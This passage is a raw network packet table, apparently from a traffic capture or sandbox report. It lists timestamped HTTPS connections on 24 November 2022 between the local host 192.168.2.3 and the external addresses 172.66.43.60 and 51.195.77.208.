Nov 24, 2022 12:21:06.300358057 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.303069115 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.303102016 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.312757969 CET	49822	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.312854052 CET	443	49822	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.314059973 CET	49822	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.314059973 CET	49822	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.314138889 CET	443	49822	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.314265966 CET	443	49822	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.353297949 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.353378057 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.354568005 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.354579926 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.363626957 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.363639116 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.483175039 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.483282089 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.483304024 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.483351946 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.495512009 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.495645046 CET	443	49821	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.495748997 CET	49821	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.607265949 CET	49823	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.607332945 CET	443	49823	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.607603073 CET	49823	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.608884096 CET	49823	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.608916044 CET	443	49823	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.608968019 CET	443	49823	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.789288044 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.789345980 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.789473057 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.790669918 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.790685892 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.838926077 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.839108944 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.863241911 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.863276958 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.863919973 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.863991022 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.864840031 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.864856005 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.918729067 CET	49825	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.918787956 CET	443	49825	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.918890953 CET	49825	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.923257113 CET	49825	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:06.923291922 CET	443	49825	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.923393965 CET	443	49825	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:06.958199024 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.958858967 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.958925962 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.959813118 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.978084087 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:06.978262901 CET	443	49824	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:06.978348017 CET	49824	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.207119942 CET	49826	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.207189083 CET	443	49826	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.207282066 CET	49826	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.207823038 CET	49826	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.207848072 CET	443	49826	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.212409019 CET	443	49826	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.224945068 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.225018024 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.225213051 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.227353096 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.227394104 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.279357910 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.279501915 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.321497917 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.321535110 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.322196960 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.322344065 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.330029964 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.330075979 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.330741882 CET	49828	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.330809116 CET	443	49828	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.330915928 CET	49828	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.331715107 CET	49828	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.331753969 CET	443	49828	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.331820965 CET	443	49828	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.403584957 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.403678894 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.403718948 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.403740883 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.403779030 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.403811932 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.418920994 CET	49827	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.418967009 CET	443	49827	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.558576107 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.558644056 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.558933020 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.560847044 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.560885906 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.570291042 CET	49830	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.570353031 CET	443	49830	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.570530891 CET	49830	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.571681023 CET	49830	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.571711063 CET	443	49830	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.571758986 CET	443	49830	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.604113102 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.604382038 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.652523041 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.652549028 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.661145926 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.661173105 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.714226961 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.714323997 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.714447975 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.735863924 CET	49829	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.735898972 CET	443	49829	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.813685894 CET	49831	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.813744068 CET	443	49831	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.813851118 CET	49831	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.814553976 CET	49831	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.814578056 CET	443	49831	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.814625978 CET	443	49831	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.877998114 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.878077030 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.878184080 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.879942894 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.879973888 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.920922995 CET	49833	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.920983076 CET	443	49833	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.921117067 CET	49833	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.921657085 CET	49833	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:07.921669960 CET	443	49833	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.924719095 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.924779892 CET	443	49833	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:07.924803019 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.984740973 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.984786034 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:07.993390083 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:07.993433952 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.072746038 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.072840929 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.073034048 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.088587046 CET	49832	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.088633060 CET	443	49832	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.092503071 CET	49834	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.092597008 CET	443	49834	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.092715025 CET	49834	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.093323946 CET	49834	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.093363047 CET	443	49834	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.093421936 CET	443	49834	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.230751991 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.230813026 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.231504917 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.231504917 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.231558084 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.287717104 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.293533087 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.303612947 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.303637028 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.316426992 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.316453934 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.334069014 CET	49836	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.334134102 CET	443	49836	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.334242105 CET	49836	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.334784985 CET	49836	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.334814072 CET	443	49836	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.334861040 CET	443	49836	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.421771049 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.421868086 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.421927929 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.421955109 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.423701048 CET	49835	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.423733950 CET	443	49835	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.533541918 CET	49837	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.533612013 CET	443	49837	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.533798933 CET	49837	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.534284115 CET	49837	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.534302950 CET	443	49837	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.534948111 CET	443	49837	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.557121992 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.557173014 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.557269096 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.561264038 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.561295033 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.632045984 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.632174015 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.639039040 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.639079094 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.643740892 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.643776894 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.752978086 CET	49839	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.753025055 CET	443	49839	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.753593922 CET	49839	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.753969908 CET	49839	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.753988981 CET	443	49839	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.754038095 CET	443	49839	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.771255016 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.771336079 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.771367073 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.771393061 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.771421909 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.771469116 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.794672966 CET	49838	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.794722080 CET	443	49838	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.969125986 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.969188929 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:08.969295025 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.972609997 CET	49841	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.972662926 CET	443	49841	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.972790956 CET	49841	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.973332882 CET	49841	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:08.973351002 CET	443	49841	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.973422050 CET	443	49841	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:08.994750977 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:08.994791985 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.048211098 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.048465967 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.100961924 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.100977898 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.115938902 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.115961075 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.183814049 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.186667919 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.186688900 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.186817884 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.198966026 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.199105024 CET	443	49840	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.199305058 CET	49840	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.231758118 CET	49842	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.231843948 CET	443	49842	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.232294083 CET	49842	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.233093023 CET	49842	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.233131886 CET	443	49842	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.233212948 CET	443	49842	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.332881927 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.332935095 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.333026886 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.336889982 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.336905003 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.386907101 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.387010098 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.414557934 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.414607048 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.415179968 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.415263891 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.416238070 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.416260004 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.440202951 CET	49844	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.440279007 CET	443	49844	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.440419912 CET	49844	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.441735029 CET	49844	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.441781044 CET	443	49844	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.441836119 CET	443	49844	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.504117966 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.504256964 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.504316092 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.504359961 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.512517929 CET	49843	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:09.512552977 CET	443	49843	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:09.793414116 CET	49845	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.793483973 CET	443	49845	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.794378996 CET	49845	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.885946035 CET	49845	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:09.885988951 CET	443	49845	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:09.886080027 CET	443	49845	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.009054899 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.009114981 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.009394884 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.025414944 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.025459051 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.030284882 CET	49847	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.030327082 CET	443	49847	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.030437946 CET	49847	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.030818939 CET	49847	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.030837059 CET	443	49847	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.030920029 CET	443	49847	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.068813086 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.072273970 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.098609924 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.098643064 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.104250908 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.104278088 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.170418024 CET	49848	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.170480013 CET	443	49848	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.170582056 CET	49848	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.170973063 CET	49848	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.171006918 CET	443	49848	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.171060085 CET	443	49848	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.190691948 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.190819025 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.190844059 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.190902948 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.192502022 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.192601919 CET	443	49846	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.192708015 CET	49846	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.313471079 CET	49849	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.313517094 CET	443	49849	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.313719988 CET	49849	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.373507023 CET	49849	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.373617887 CET	443	49849	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.373863935 CET	443	49849	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.499170065 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.499217987 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.499305964 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.501940966 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.501959085 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.546433926 CET	49851	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.546499968 CET	443	49851	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.546586990 CET	49851	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.546928883 CET	49851	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.546948910 CET	443	49851	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.546992064 CET	443	49851	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.549424887 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.549530983 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.623938084 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.623964071 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.624445915 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.625462055 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.629456043 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.629472017 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.717550039 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.717627048 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.717639923 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.717680931 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.722948074 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.723062038 CET	443	49850	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:10.723138094 CET	49850	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:10.877680063 CET	49852	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.877733946 CET	443	49852	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.877832890 CET	49852	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.878346920 CET	49852	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:10.878365993 CET	443	49852	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:10.878446102 CET	443	49852	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.008085012 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.008151054 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.008284092 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.013597012 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.013629913 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.046705961 CET	49854	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.046773911 CET	443	49854	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.046894073 CET	49854	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.047336102 CET	49854	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:11.047363043 CET	443	49854	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.047437906 CET	443	49854	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:11.059552908 CET	443	49853	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:11.064851046 CET	49853	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:11.087042093 CET	49853	443	192.168.2.3	172.66.43.60
